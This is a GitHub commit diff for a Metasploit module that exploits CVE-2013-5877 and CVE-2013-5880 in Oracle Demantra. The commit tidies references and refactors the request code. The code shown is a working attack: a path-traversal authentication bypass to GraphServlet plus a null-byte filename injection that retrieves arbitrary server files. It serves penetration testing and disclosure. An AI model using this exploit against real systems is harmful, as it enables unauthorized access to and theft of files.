Skip to content

Commit 1499484

Browse files
author
coma
committed
Add CVE-2013-5877+CVE-2013-5880 for Oracle Demantra fixed issues
1 parent 107901b commit 1499484

File tree

1 file changed

+14
-18
lines changed

1 file changed

+14
-18
lines changed

modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb

Lines changed: 14 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -20,16 +20,17 @@ def initialize(info = {})
2020
},
2121
'References' =>
2222
[
23-
[ 'CVE', '2013-5877', '2013-5880'],
24-
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/',
25-
'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/' ]
23+
[ 'CVE', '2013-5877'],
24+
[ 'CVE', '2013-5880'],
25+
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/'],
26+
[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/']
2627
],
2728
'Author' =>
2829
[
2930
'Oliver Gruskovnjak'
3031
],
3132
'License' => MSF_LICENSE,
32-
'DisclosureDate' => "January 2014"
33+
'DisclosureDate' => "Feburary 28 2014"
3334
))
3435

3536
register_options(
@@ -44,18 +45,19 @@ def initialize(info = {})
4445

4546
def run_host(ip)
4647
filename = datastore['FILEPATH']
48+
authbypass = "/demantra/common/loginCheck.jsp/../../GraphServlet"
4749

48-
res = send_request_raw({
49-
'uri' => "/demantra/common/loginCheck.jsp/../../GraphServlet",
50+
res = send_request_cgi({
51+
'uri' => normalize_uri(authbypass),
5052
'method' => 'POST',
51-
'ctype' => 'application/x-www-form-urlencoded',
52-
'data' => "filename=#{filename}%00",
53+
'encode_params' => false,
54+
'vars_post' => {
55+
'filename' => "#{filename}%00"
56+
}
5357
})
5458

55-
5659
if res.nil? or res.body.empty?
57-
print_error("No content retrieved from: #{ip}")
58-
return
60+
fail_with("No content retrieved from: #{ip}")
5961
end
6062

6163
if res.code == 404
@@ -65,11 +67,6 @@ def run_host(ip)
6567

6668
if res.code == 200
6769
print_status("#{ip}:#{rport} returns: #{res.code.to_s}")
68-
end
69-
70-
if res.body.empty?
71-
print_error("#{ip}:#{rport} - Empty response, no file downloaded")
72-
else
7370
fname = File.basename(datastore['FILEPATH'])
7471
path = store_loot(
7572
'oracle.demantra',
@@ -78,8 +75,7 @@ def run_host(ip)
7875
res.body,
7976
fname)
8077

81-
print_status("#{ip}:#{rport} - File saved in: #{path}")
78+
print_good("#{ip}:#{rport} - File saved in: #{path}")
8279
end
8380
end
84-
8581
end

0 commit comments

Comments
 (0)